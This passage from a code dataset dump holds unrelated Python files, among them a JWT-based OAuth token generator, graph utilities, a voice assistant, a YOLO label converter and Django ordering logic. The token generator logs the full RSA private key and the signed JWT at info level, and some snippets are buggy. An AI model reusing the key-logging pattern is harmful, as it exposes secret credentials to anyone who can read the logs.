unittest.main()","sub_path":"workit-back/views/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"129176005","text":"import importlib\n\nfrom libqtile.utils import QtileError\n\nCORES = [\n \"wayland\",\n \"x11\",\n]\n\n\ndef get_core(backend, *args):\n if backend not in CORES:\n raise QtileError(f\"Backend {backend} does not exist\")\n\n return 
importlib.import_module(f\"libqtile.backend.{backend}.core\").Core(*args)\n","sub_path":"libqtile/backend/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162645334","text":"# Takes 7 whole numbers and decides if the number is a multiple of 3\n# If it is, add it to the total, if not disregard\n\nMAX_NUMBERS = 7\ncount = 0\ntotal = 0\n\nwhile(count < MAX_NUMBERS):\n #{rompts user to enter a number\n print(\"Please enter a whole number\")\n\n #Stores the number in a variable\n num = int(input())\n\n #Checks if there is any remainder from the number\n if (num % 3 == 0):\n total = total + num\n #Subtracts number from number to remove it from the running total\n else:\n num - num\n count = count+ 1\nprint(\"The total for all number that are multiples of 3 is:\", total)\n","sub_path":"Intro to Python Book Quiz/Question 4.py","file_name":"Question 4.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"477664269","text":"import sys\r\nsys.path.insert(0, 'lib')\r\nimport webapp2\r\nimport base64\r\nfrom Crypto.PublicKey import RSA\r\nfrom Crypto.Signature import PKCS1_v1_5\r\nfrom Crypto import Random\r\nfrom Crypto.Hash import SHA256\r\nfrom base64 import b64encode, b64decode\r\nimport json\r\nimport time\r\nimport logging\r\nimport httplib\r\nfrom google.appengine.api import urlfetch\r\nimport urllib\r\n\r\nclass GenerateAccessTokenHandler(webapp2.RequestHandler):\r\n @classmethod\r\n def sign_data(cls, private_key, data):\r\n rsakey = RSA.importKey(private_key,passphrase=None)\r\n signer = PKCS1_v1_5.new(rsakey)\r\n digest = SHA256.new()\r\n digest.update(data)\r\n sign = signer.sign(digest)\r\n return base64.b64encode(sign)\r\n\r\n def get(self):\r\n header = \"\"\"{\"alg\":\"SHA256withRSA\",\"typ\":\"JWT\"})\"\"\"\r\n logging.info('header:: %s', header)\r\n encoded_header = base64.b64encode(bytearray(header))\r\n logging.info('encoded_header:: %s', encoded_header)\r\n\r\n issuance_time = int(round(time.time() * 1000))\r\n #exp_time = issuance_time + 7200000\r\n\r\n claim = \"\"\"{\r\n \"iss\":\"OFFER_REC_SYS\",\r\n \"aud\":\"https://oauthas.searshc.com/oauthAS/service/oAuth/token.json\",\r\n \"exp\":\"\"\"+str(issuance_time)+\"\"\",\r\n \"iat\":\"\"\"+str(issuance_time)+\"\"\"}\"\"\"\r\n logging.info('claim:: %s', claim)\r\n encoded_claim = base64.b64encode(bytearray(claim))\r\n logging.info('encoded_claim:: %s', encoded_claim)\r\n\r\n combined_header_claim = encoded_header + \".\" + encoded_claim\r\n input_signature = bytearray(combined_header_claim)\r\n logging.info('input_signature:: %s', input_signature)\r\n\r\n RSA_PRIVATE_KEY = open('privateKey.properties').read()\r\n logging.info('RSA_PRIVATE_KEY:: %s', RSA_PRIVATE_KEY)\r\n\r\n\r\n encoded_sign = GenerateAccessTokenHandler.sign_data(RSA_PRIVATE_KEY, input_signature)\r\n logging.info('encoded_sign:: %s', encoded_sign)\r\n\r\n\r\n jwt = str(encoded_header + \".\" + encoded_claim + \".\"+ encoded_sign)\r\n logging.info('jwt:: %s', jwt)\r\n\r\n payload = \"\"\"{\"grant_type\": \"urn:ietf:params:oauth:grant-type:jwt-bearer\",\"assertion\":\\\"\"\"\"+jwt+\"\"\"\\\"}\"\"\"\r\n request_header = {\"content-type\": \"application/json\"}\r\n\r\n logging.info('payload:: %s', payload)\r\n\r\n #https://trstoaapp1.vm.itg.corp.us.shldcorp.com:8553/oauthAS/service/oAuth/token.json\r\n\r\n try:\r\n retry_count = 5\r\n count = 
1\r\n while(count <= retry_count):\r\n headers = {'Content-Type': 'application/json'}\r\n urlfetch.set_default_fetch_deadline(10)\r\n result = urlfetch.fetch(\r\n url='https://oauthas.searshc.com/oauthAS/service/oAuth/token.json',\r\n payload=payload,\r\n method=urlfetch.POST,\r\n headers=headers)\r\n logging.info('****Try #: %s', count)\r\n logging.info('****result.status_code: %s', result.status_code)\r\n logging.info('****result.content: %s', result.content)\r\n if(result.status_code != 200):\r\n count = count + 1\r\n continue\r\n else:\r\n break\r\n\r\n self.response.write(result.content)\r\n except urlfetch.Error:\r\n logging.exception('Caught exception fetching url')\r\n\r\n\r\n# [START app]\r\napp = webapp2.WSGIApplication([\r\n ('/generateAccessToken', GenerateAccessTokenHandler)\r\n], debug=True)\r\n\r\n# [END app]\r\n\r\n\r\ndef main():\r\n app.run()\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"src/Production-AccessTokenGeneration/generateAccessToken.py","file_name":"generateAccessToken.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"545764206","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n#\n# Copyright 2015-2021, Vincenzo Arcidiacono;\n# Licensed under the EUPL (the 'Licence');\n# You may not use this work except in compliance with the Licence.\n# You may obtain a copy of the Licence at: http://ec.europa.eu/idabc/eupl\n\n\"\"\"\nIt contains the `DiGraph` class.\n\"\"\"\n\n\nclass DiGraph:\n __slots__ = 'nodes', 'succ', 'pred'\n\n def __reduce__(self):\n return self.__class__, (self.nodes, self.succ)\n\n def __init__(self, nodes=None, adj=None):\n self.nodes = {} if nodes is None else nodes\n self.succ = {} if adj is None else adj\n self.pred = pred = {}\n for u, e in self.succ.items():\n for v, attr in e.items():\n pred[v] = d = pred.get(v, {})\n d[u] = attr\n keys = set(self.succ).union(self.pred).union(self.nodes)\n self.nodes.update({k: {} for k in keys - set(self.nodes)})\n self.succ.update({k: {} for k in keys - set(self.succ)})\n self.pred.update({k: {} for k in keys - set(self.pred)})\n\n def __getitem__(self, item):\n return self.succ[item]\n\n @property\n def adj(self):\n return self.succ\n\n @staticmethod\n def _add_node(nodes, succ, pred, n, **attr):\n if n not in nodes: # Add nodes.\n succ[n], pred[n], nodes[n] = {}, {}, attr\n elif attr:\n nodes[n].update(attr)\n\n @staticmethod\n def _remove_node(nodes, succ, pred, n):\n for u in succ[n]:\n del pred[u][n]\n for u in pred[n]:\n del succ[u][n]\n del nodes[n], succ[n], pred[n]\n\n def add_node(self, n, **attr):\n self._add_node(self.nodes, self.succ, self.pred, n, **attr)\n return self\n\n def remove_node(self, n):\n self._remove_node(self.nodes, self.succ, self.pred, n)\n return self\n\n def add_nodes_from(self, nodes_for_adding):\n nodes, succ, pred, fn = self.nodes, self.succ, self.pred, self._add_node\n for n in nodes_for_adding:\n try:\n fn(nodes, succ, pred, n)\n except TypeError:\n fn(nodes, succ, pred, n[0], **n[1])\n return self\n\n def remove_nodes_from(self, nodes):\n nd, succ, pred, fn = self.nodes, self.succ, self.pred, self._remove_node\n for n in nodes:\n fn(nd, succ, pred, n)\n return self\n\n @staticmethod\n def _add_edge(nodes, succ, pred, u, v, **attr):\n DiGraph._add_node(nodes, succ, pred, u)\n DiGraph._add_node(nodes, succ, pred, v)\n succ[u][v] = pred[v][u] = dd = succ[u].get(v, {})\n dd.update(attr)\n\n def add_edge(self, u, v, **attr):\n 
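# delegate to the static helper, which also creates any missing endpoint nodes\n        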
self._add_edge(self.nodes, self.succ, self.pred, u, v, **attr)\n return self\n\n def add_edges_from(self, ebunch_to_add):\n nodes, succ, pred, fn = self.nodes, self.succ, self.pred, self._add_edge\n for e in ebunch_to_add:\n try:\n (u, v), attr = e, {}\n except ValueError:\n u, v, attr = e\n fn(nodes, succ, pred, u, v, **attr)\n\n def remove_edge(self, u, v):\n del self.succ[u][v], self.pred[v][u]\n\n def remove_edges_from(self, ebunch):\n succ, pred = self.succ, self.pred\n for e in ebunch:\n u, v = e[:2] # ignore edge data\n del succ[u][v], pred[v][u]\n\n @property\n def edges(self):\n from .dsp import stack_nested_keys\n return dict(stack_nested_keys(self.succ, depth=2))\n\n def has_edge(self, u, v):\n try:\n return v in self.succ[u]\n except KeyError:\n return False\n\n def subgraph(self, nodes):\n nodes = {n: attr.copy() for n, attr in self.nodes.items() if n in nodes}\n adj = {}\n for u, d in self.succ.items():\n if u in nodes:\n adj[u] = {v: attr.copy() for v, attr in d.items() if v in nodes}\n return self.__class__(nodes, adj)\n\n def copy(self):\n nodes = {n: attr.copy() for n, attr in self.nodes.items()}\n adj = {}\n for u, d in self.succ.items():\n adj[u] = {v: attr.copy() for v, attr in d.items()}\n return self.__class__(nodes, adj)\n","sub_path":"Lib/site-packages/schedula/utils/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":4169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"508513506","text":"import pyttsx3\r\nimport win32com\r\nimport speech_recognition as sr\r\nimport pyspeech\r\nimport os\r\nimport re\r\n\r\ntry:\r\n\r\n engine = pyttsx3.init()\r\n\r\nexcept ImportError:\r\n print('requested Driver not found')\r\nexcept RuntimeError:\r\n print('Driver fails to initialised')\r\nvoices = engine.getProperty('voices')\r\nfor voice in voices:\r\n print(voice.id)\r\nengine.setProperty('voice', '')\r\n\r\nrate = engine.getProperty('rate')\r\nengine.setProperty('rate', rate)\r\n\r\n\r\ndef speak(cmd):\r\n engine.say(cmd)\r\n engine.runAndWait()\r\n\r\n\r\ndef read_voice():\r\n voice_text = ''\r\n print('Listening...')\r\n speech = sr.Recognizer()\r\n with sr.Microphone() as source:\r\n audio = speech.listen(source)\r\n try:\r\n voice_text = speech.recognize_google(audio)\r\n except sr.UnknownValueError:\r\n pass\r\n except sr.RequestError as e:\r\n speak(\"Internet is not connected\")\r\n exit(1)\r\n return voice_text\r\n\r\n\r\nif __name__ == '__main__':\r\n speak(\"hello,I am Caption Jakesparrow as your artificial intelligence\")\r\n\r\nwhile True:\r\n voice_note = read_voice()\r\n\r\n print(\"you said: {}\".format(voice_note))\r\n\r\n if \"hello\" in voice_note:\r\n speak('hello sir, how can i help you?')\r\n continue\r\n elif \"name\" in voice_note:\r\n speak('My name is Caption Jacksparrow')\r\n continue\r\n elif \"open\" in voice_note:\r\n speak(\"ok sir..\")\r\n os.open('C:\\\\ ', \"r\")\r\n continue\r\n elif \"bye\" in voice_note:\r\n speak(\"bye sir, Happy to help you. 
have a good day..\")\r\n exit()\r\n\r\n","sub_path":"assistance/shreya_ver_1.py","file_name":"shreya_ver_1.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"496725022","text":"import os\nimport csv\nimport pandas as pd\nimport time\nimport cv2\n\n\ndef convert(size, box):\n\tdw = 1./(size[0])\n\tdh = 1./(size[1])\n\tx = (box[0] + box[1])/2.0 - 1\n\ty = (box[2] + box[3])/2.0 - 1\n\tw = box[1] - box[0]\n\th = box[3] - box[2]\n\tx = x*dw\n\tw = w*dw\n\ty = y*dh\n\th = h*dh\n\treturn (x,y,w,h)\n\ngt_path='/home/macho/Desktop/Aletheia-AI/datasets/preprocess_and_validation/convert2Yolo/labels/annotations.txt'\nimages_path='/home/macho/Desktop/Aletheia-AI/datasets/preprocess_and_validation/convert2Yolo/images/'\nsave_label_path='/home/macho/Desktop/Aletheia-AI/datasets/preprocess_and_validation/convert2Yolo/labels/'\nfd = open(gt_path, 'r')\nlines = fd.readlines()\n\nfind_lbl=[]\nfor line in lines:\n\tline = line.strip().split(',')\n\tnumboxes=int(line[1])#int((len(line)-1)/5)\n\n\t#print('image name-->',line[0])\n\tframe=cv2.imread(images_path+line[0])\n\twidth = int(frame.shape[1])\n\theight= int(frame.shape[0])\n\n\tlabel_name=line[0].split('.')[0]\n\t#frame_=frame.copy()\n\n\twith open(save_label_path+label_name+'.txt','w') as fw:\n\t\t# print(\"is image mein \",line[0] ,\"itny bounding box hain\",line[1],\"boxes -->\")\n\n\t\tfor i in range(2,numboxes*6,6):\n\t\t\t#print(i)\n\t\t\tx=int(line[i+1])\n\t\t\ty=int(line[i+2])\n\t\t\tw=int(line[i+3])#+x\n\t\t\th=int(line[i+4])#+y\n\t\t\t# #print(line[i],line[i+1],line[i+2],line[i+3],line[i+4],line[i+5])\n\t\t\tb=[]\n\t\t\tb.append(x)\n\t\t\tb.append(w)\n\t\t\tb.append(y)\n\t\t\tb.append(h)\n\t\t\tfind_lbl.append(line[i+5].strip())\n\t\t\t# cv2.rectangle(frame, (x,y), (w,h),(0,0,255), 2)\n\t\t#cv2.imshow('frame',frame)\n\t\t#cv2.waitKey(0)\n\t\t\t#frame_=frame.copy()\n\t\t\t#print(b)\n\t\t\tbb = convert((width,height), b)\n\t\t# \tlabel=''\n\t\t\ttemp=line[i+5].strip()\n\t\t\tif temp=='person':\n\t\t\t\tlabel='0'\n\t\t\t# if temp=='null':\n\t\t\t# \tlabel='0'\n\t\t\t\n\t\t\tif temp not in find_lbl:\n\t\t\t\tprint(\"garbar\",temp,len(temp))\n\t\t\tfw.write('0 '+\" \".join([str(a) for a in bb])+'\\n')\n\tfw.close()\nprint(set(find_lbl))","sub_path":"yolo_preprocessing.py","file_name":"yolo_preprocessing.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"640084367","text":"import random\n\nstormtrooper = { \"name\": \"stormtrooper\",\n \"description\": \"Can't shoot for shit\",\n \"health\": random.randint(1,10),\n \"damage\": random.randint(1,100),\n \"items\":[\"blaster\",\"helmet\"],\n \"killwords\":[\"bang\",\"pew\",\"shoot\",\"kill\"]\n }\n\n\ngreedo = { \"name\": \"Greedo\",\n \"description\":\"Who shot first?\",\n \"health\":50,\n \"damage\":20,\n \"items\":[\"password\"],\n \"killwords\":[\"bang\",\"pew\",\"shoot\",\"kill\"]\n }\n\ndarth_kirill = { \"name\" : \"Darth Kirill\",\n \"description\": \"He is your lecturer.\",\n \"health\" : 100,\n \"damage\": 100,\n \"items\": [\"lightsaber\",\"mask\",\"cigarettes\"],\n \"killwords\":[\"clash\",\"strike\",\"force push\",\"force choke\",\"hit\"]\n }\n","sub_path":"enemies.py","file_name":"enemies.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"246313725","text":"import numpy as np\nimport networkx as 
nx\nimport random\n\n\ndef load_graph_directed(file):\n # loading edges from file\n edge_list = np.loadtxt(file, dtype=int)\n\n # create the graph\n g = nx.DiGraph()\n g.add_edges_from(edge_list)\n\n # adding attributes to nodes and edges\n for n in g.nodes():\n # adding threshold to node\n g.add_node(n, t=np.random.random())\n # adding weight to the edge\n in_deg = g.in_degree(n)\n if in_deg != 0:\n g.add_edges_from(g.in_edges(n), w=(1/in_deg))\n # adding activation weights\n g.add_edges_from(g.edges(), w1=0)\n g.add_edges_from(g.edges(), w2=0)\n g.add_edges_from(g.edges(), free_end=1)\n # defining 3 lists to hold free nodes, first player and second player nodes\n g.graph['free'] = g.nodes()\n g.graph['1'] = []\n g.graph['2'] = []\n\n return g\n\n\ndef load_graph_undirected(file):\n # loading edges from file\n edges = np.loadtxt(file, dtype=int)\n\n edge_list = np.zeros((2 * edges.shape[0], 2))\n edge_list[0:edges.shape[0], :] = edges[:, :]\n\n edge_list[edges.shape[0]:, 0] = edges[:, 1]\n edge_list[edges.shape[0]:, 1] = edges[:, 0]\n\n # create the graph\n g = nx.DiGraph()\n g.add_edges_from(edge_list)\n\n # adding attributes to nodes and edges\n for n in g.nodes():\n # adding threshold to node\n g.add_node(n, t=np.random.random())\n # adding weight to the edge\n in_deg = g.in_degree(n)\n if in_deg != 0:\n g.add_edges_from(g.in_edges(n), w=(1/in_deg))\n # adding activation weights\n g.add_edges_from(g.edges(), w1=0)\n g.add_edges_from(g.edges(), w2=0)\n g.add_edges_from(g.edges(), free_end=1)\n # defining 3 lists to hold free nodes, first player and second player nodes\n g.graph['free'] = g.nodes()\n g.graph['1'] = []\n g.graph['2'] = []\n\n return g\n\n\ndef activate_node(g, node, player):\n # First setting the edge weight to be activated\n for u, v, d in g.edges(node, data=True):\n d['w'+str(player)] = d['w']\n # Second adding nodes to lists\n g.graph['free'].remove(node)\n if player == 1:\n g.graph['1'].append(node)\n elif player == 2:\n g.graph['2'].append(node)\n # Third setting edges to be non free(free=0)\n for edge in g.in_edges(node, data=True):\n edge[2]['free_end'] = 0\n\n return\n\n\ndef diffuse(g):\n activated_first = []\n activated_second = []\n\n activated_nodes = g.graph['1'] + g.graph['2']\n free_nodes_set = set(g.graph['free'])\n\n for node_parent in activated_nodes:\n for node in g.neighbors(node_parent):\n if node in free_nodes_set:\n threshold = g.node[node]['t']\n sum1 = g.in_degree(node, 'w1')\n sum2 = g.in_degree(node, 'w2')\n if sum1 > threshold and sum1 > sum2:\n activated_first.append(node)\n if sum2 > threshold and sum2 > sum1:\n activated_second.append(node)\n\n activated_first = np.unique(activated_first)\n activated_second = np.unique(activated_second)\n return activated_first, activated_second\n\n\ndef get_feature(g):\n # 0. Number of free nodes\n # 1. Summation of degrees of all free nodes\n # 2. Summation of weight of the edges for which both vertices are free\n # 3. Maximum degree among all free nodes\n # 4. Maximum sum of free out-edge weight of a node among all nodes\n # 5. Maximum sum of free out-edge weight of a node among nodes which are the first player's neighbors\n # 6. 
Maximum sum of free out-edge weight of a node among nodes which are the second player's neighbors\n\n f = np.zeros(7)\n free_nodes = g.graph['free']\n free_nodes_set = set(free_nodes)\n\n first_player_neighbors = set()\n for node in g.graph['1']:\n first_player_neighbors |= set(g.neighbors(node))\n second_player_neighbors = set()\n for node in g.graph['2']:\n second_player_neighbors |= set(g.neighbors(node))\n\n # 0\n f[0] = len(free_nodes)\n # 1, 3\n degrees = list(g.out_degree(free_nodes).values())\n if degrees:\n f[1] = sum(degrees)\n f[3] = max(degrees)\n\n # 2, 4, 5, 6\n f2 = 0\n max4 = 0\n max5 = 0\n max6 = 0\n\n for node in free_nodes:\n weight_free = 0\n for edge in g.edges(node, data=True):\n if edge[1] in free_nodes_set:\n weight_free += edge[2]['w']\n f2 += weight_free\n\n if weight_free > max4:\n max4 = weight_free\n if node in first_player_neighbors:\n if weight_free > max5:\n max5 = weight_free\n if node in second_player_neighbors:\n if weight_free > max6:\n max6 = weight_free\n\n f[2] = f2\n f[4] = max4\n f[5] = max5\n f[6] = max6\n\n return f\n\n\ndef feature_map_lmh(feature, feature_lmh_ranges):\n result = np.zeros(7)\n for i in range(7):\n if feature[i] < feature_lmh_ranges[i, 0]:\n result[i] = 0\n elif feature_lmh_ranges[i, 0] <= feature[i] < feature_lmh_ranges[i, 1]:\n result[i] = 1\n elif feature[i] >= feature_lmh_ranges[i, 1]:\n result[i] = 2\n\n return result\n\n\ndef feature_map_number(feature_lmh):\n n = 0\n for i in range(7):\n n += feature_lmh[i]*pow(3, 6-i)\n\n return int(n)\n\n\ndef get_state(g: nx.Graph):\n r1 = len(g.graph['1'])\n r2 = len(g.graph['2'])\n diff = r1 - r2\n\n r = 0\n if diff < -100:\n r = 0\n elif -100 <= diff < -50:\n r = 1\n elif -50 <= diff < 0:\n r = 2\n elif 0 <= diff < 50:\n r = 3\n elif 50 <= diff < 100:\n r = 4\n elif 100 <= diff:\n r = 5\n\n return r\n\n\ndef create_random_graph(g: nx.Graph):\n n1 = random.randint(1, len(g.graph['free']) - 2)\n n2 = random.randint(1, len(g.graph['free']) - n1)\n for i in range(n1):\n r = random.randint(0, len(g.graph['free']) - 1)\n activate_node(g, g.graph['free'][r], 1)\n for i in range(n2):\n r = random.randint(0, len(g.graph['free']) - 1)\n activate_node(g, g.graph['free'][r], 2)\n return g\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":6071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"594878797","text":"##\n## Imprima los valores unicos e la columna _c4 de \n## de la tabla tbl1 en mayusculas\n## \n\n\nimport pandas as pd\nimport numpy as np\ndf=pd.read_csv('tbl0.tsv',delimiter='\\t')\ndg=pd.read_csv('tbl1.tsv',delimiter='\\t')\ndh=pd.read_csv('tbl2.tsv',delimiter='\\t')\n\n#Respuesta\n\nunique= dg['_c4'].unique() \nunique2= unique.tolist()\nunique3 = [elemt.upper() for elemt in unique2]\nunique3.sort()\nunique3","sub_path":"q04.py","file_name":"q04.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"162253522","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nfrom django.shortcuts import render\n\nfrom django.http import HttpResponseRedirect\nfrom django.http import HttpResponse\nimport json\nfrom django.contrib.auth.decorators import login_required\nimport logging\n\nfrom proil_order.models import *\nfrom main.models import *\nfrom main.forms import Validator\nfrom datetime import datetime, timedelta, time\nfrom proil_profile.models import FavoriteAddress\nfrom proil_profile.models 
import UserDiscount\n\nlogger = logging.getLogger('django')\n\ndef get_dates(cnt):\n dates = []\n if cnt == 0:\n return []\n dates.append(datetime.today().date())\n delta = timedelta(days=1)\n while (cnt - 1):\n dates.append(dates[-1] + delta)\n cnt-=1\n return dates\n\ndef get_free_intervals(date):\n date = date.split('.')\n if len(date) == 3:\n busy_intervals = set()\n result = []\n all_intervals = TimeInterval.objects.all()\n for rt in ReservedTime.objects.filter(date__year=int(date[2]), date__month=int(date[1]), date__day=int(date[0])):\n if rt.time_interval.reserve_times <= rt.times:\n busy_intervals.add(rt.time_interval.get_interval())\n date = '{}/{}/{}'.format(date[2], date[1], date[0])\n try:\n for ti in all_intervals:\n FMT = '%Y/%m/%d %H:%M:%S'\n delta = timedelta(minutes=15)\n begin = datetime.strptime('{} {}'.format(date, str(ti.begin)), FMT)\n end = datetime.strptime('{} {}'.format(date, str(ti.end)), FMT)\n now = datetime.now()\n t = ti.get_interval()\n if end < now or now > begin + delta and now < end or t in busy_intervals:\n logger.info(\"begin {} end {} now {}\".format(begin,end,now))\n continue\n result.append(t)\n logger.info(\"Free intervals\")\n logger.info(result)\n logger.info('Busy intervals')\n logger.info(busy_intervals)\n result.sort()\n return ({'status': 'ok', 'data' : result })\n except Exception as e:\n pass\n return ({ 'status': 'error' , 'mes': 'Incorrect parameter date, pattern day.month.year' })\n\ndef get_all_free_intervals():\n free_intervals = []\n all_free_intervals = []\n today = datetime.today().date()\n delta = timedelta(days=30)\n all_intervals = TimeInterval.objects.all()\n\n busy_intervals = set()\n FMT_D = '%d-%m-%Y'\n for rt in ReservedTime.objects.filter(date__gte=today).filter(date__lte=today + delta):\n if rt.time_interval.reserve_times <= rt.times:\n busy_intervals.add('{} {}'.format(rt.date.strftime(FMT_D), rt.time_interval.get_interval()))\n\n for date in get_dates(30):\n date = date.strftime(FMT_D)\n all_free_intervals.append([date, []])\n for ti in all_intervals:\n FMT = '%d-%m-%Y %H:%M:%S'\n delta = timedelta(minutes=15)\n begin = datetime.strptime('{} {}'.format(date, str(ti.begin)), FMT)\n end = datetime.strptime('{} {}'.format(date, str(ti.end)), FMT)\n now = datetime.now()\n t = ti.get_interval()\n if now.strftime(FMT_D) == date and (end < now or now > begin + delta and now < end or (date + ' ' + t) in busy_intervals):\n continue\n all_free_intervals[-1][1].append(t)\n all_free_intervals[-1][1].sort()\n\n return ({'status': 'ok', 'data' : all_free_intervals })\n\ndef create_order(user, order_time, order_date, order_phone, order_location, order_options, order_products, car_number, car_region, comment=None):\n (begin, end) = order_time.split('-')\n date = order_date.split('.')\n order_date = datetime(int(date[2]),int(date[1]),int(date[0])).date()\n logger.info(order_date)\n if not (begin and end):\n return (False, \"Time interval is incorrect\")\n time_interval = TimeInterval.objects.get(begin='{}:00'.format(begin), end='{}:00'.format(end))\n logger.info(time_interval)\n order_products = json.loads(order_products)\n logger.info(order_products)\n for p in order_products.keys():\n if str(order_products[p]).isdigit() and int(order_products[p]) <= 0:\n order_products.pop(p, None)\n logger.info(order_products)\n order_location = json.loads(order_location)\n if not ('address' in order_location and 'coordinates' in order_location):\n return (False, \"Incorrect location\")\n order_options = json.loads(order_options)\n product_names = 
order_products.keys()\n products = Product.objects.filter(name__in=product_names)\n options = Option.objects.filter(id__in=order_options)\n logger.info(products)\n logger.warn(product_names);\n reserved_time = None\n try:\n reserved_time = ReservedTime.objects.get(time_interval=time_interval, date=order_date)\n except:\n logger.info('New reserved time')\n reserved_time = ReservedTime.objects.create(time_interval=time_interval, date=order_date, times=0)\n\n if reserved_time.times >= time_interval.reserve_times:\n return (False, u\"Пока вы оформляли заказ, выбранный временной промежуток переполнился, пожалуйста выберите другой промежуток на 2ом шаге заказа\")\n reserved_time.times = reserved_time.times + 1\n reserved_time.users.add(user)\n reserved_time.save()\n logger.info(reserved_time)\n\n if len(products) != len(product_names):\n return (False, \"Products error\")\n if len(options) != len(order_options):\n return (False, \"Options error\")\n empty_oil_error = True\n bulk_order_product = []\n total = 0.0\n for p in products:\n amount = 0\n if p.is_oil or p.is_full:\n empty_oil_error = False\n\n amount = order_products[p.name]\n total += float(amount) * float(p.price)\n if float(amount) > 0.0:\n bulk_order_product.append(OrderProduct(product=p,amount=amount))\n\n if empty_oil_error:\n return (False, \"Oil error\")\n status = Status.objects.get(name='processing')\n car = None\n try:\n car = Car.objects.get(user=user, car_number = car_number, car_region = car_region)\n except Exception as e:\n logger.error(e)\n return (False, 'Автомобиль с номером {} и регионом {} не найден'.format(car_number, car_region))\n\n order = Order.objects.create(\n user=user,\n car = car,\n reserved_time = reserved_time,\n delivery_address = order_location['address'],\n delivery_coordinates = order_location['coordinates'],\n total = total,\n comment = comment,\n status = status,\n order_phone = order_phone\n )\n for option in options:\n order.options.add(option)\n if len(options):\n order.save()\n for order_product in bulk_order_product:\n order_product.order = order\n logger.info(order)\n OrderProduct.objects.bulk_create(bulk_order_product);\n \n return (True, order)\n","sub_path":"proil_order/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":7111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"308428826","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 20 06:13:13 2020\n\n@author: farhan\n\"\"\"\n\n#this script combines the .ss_sa feature. 
Takes input fasta_chain_1, fasta_chain_2, ss_sa_file1, and ss_sa_file2\n#usage: python combineSS_SA.py \n\nimport sys,os\n\ndef readFasta(file):\n l=\"\"\n seq=\"\"\n with open (file,\"r\") as f:\n l=f.readline().strip()\n #name=l.split()[0].replace(\">\",\"\").strip()\n seq=f.readline().strip()\n ss=f.readline().strip()\n sa=f.readline().strip()\n \n #print (name)\n \n L=len(seq)\n return L,seq,ss,sa\n\n#fastafile1=os.path.abspath(sys.argv[1])\n#fastafile2=os.path.abspath(sys.argv[2])\nss_file1=os.path.abspath(sys.argv[1])\nss_file2=os.path.abspath(sys.argv[2])\n\nname_1=os.path.basename(ss_file1).replace(\".ss_sa\",\"\").replace(\".fasta\",\"\")\nname_2=os.path.basename(ss_file2).replace(\".ss_sa\",\"\").replace(\".fasta\",\"\")\nchain_1=name_1.split(\"_\")[-1][-1]\nchain_2=name_2.split(\"_\")[-1][-1]\n\nL_1,seq_1,ss_1,sa_1=readFasta(ss_file1)\nL_2,seq_2,ss_2,sa_2=readFasta(ss_file2)\nnew_name=name_1.split(\"_\")[0]+\"_\"+chain_1+chain_2\nprint (name_1,chain_1,L_1,seq_1,ss_1,sa_1)\n#sys.exit()\n\n\nif (len(sys.argv)==4):\n outfile=os.path.abspath(sys.argv[3])\nelse:\n outfile=os.path.dirname(ss_file1)+\"/\"+os.path.basename(ss_file1)[0:4]+\"_\"+chain_1+chain_2+\".ss_sa\"\nif not os.path.isdir(os.path.dirname(outfile)): os.makedirs(os.path.dirname(outfile))\n\n\n\n\nss1=[] \nss1.append(\">\"+new_name)\nss1.append(seq_1+seq_2)\nss1.append(ss_1+ss_2)\nss1.append(sa_1+sa_2)\n\nwith open (outfile,\"w\") as f:\n for line in ss1:\n f.write(line+\"\\n\")\n print (line)\n\nwith open (outfile.replace(\".ss_sa\",\".ss\"),\"w\") as f:\n f.write(ss1[0]+\"\\n\")\n f.write(ss1[2]+\"\\n\")\n print (line)\n\nwith open (outfile.replace(\".ss_sa\",\".acc\"),\"w\") as f:\n f.write(ss1[0]+\"\\n\")\n f.write(ss1[3]+\"\\n\")\n print (line)\n","sub_path":"libs/scripts/feature_gen_hetero/combineSS_SA.py","file_name":"combineSS_SA.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"148327006","text":"def readData(filename):\n\tinputFile = open(filename)\n\n\tgrid = []\n\n\tfor line in inputFile:\n\t\tline = line.strip().split(' ')\n\t\tline = [int(x) for x in line]\n\t\tgrid.append(line)\n\n\treturn grid\n\n#Does the same thing as the above function, one line for shits and giggles\ndef readData2(filename):\n\treturn [[int(x) for x in line.strip().split(' ')] for line in open(filename)]\n\ndef findMaxProd(grid, n):\n\tmaxHorizProd, maxVertProd, maxDownAndRightDiag, maxUpAndRightDiag = 0, 0, 0, 0\n\tlength = len(grid)\n\n\tfor row in range(0, length):\n\t\tfor i in range(0, length):\n\t\t\tvertProd = grid[row][i]\n\t\t\thorizProd = grid[row][i]\n\t\t\tdownandRightDiag = 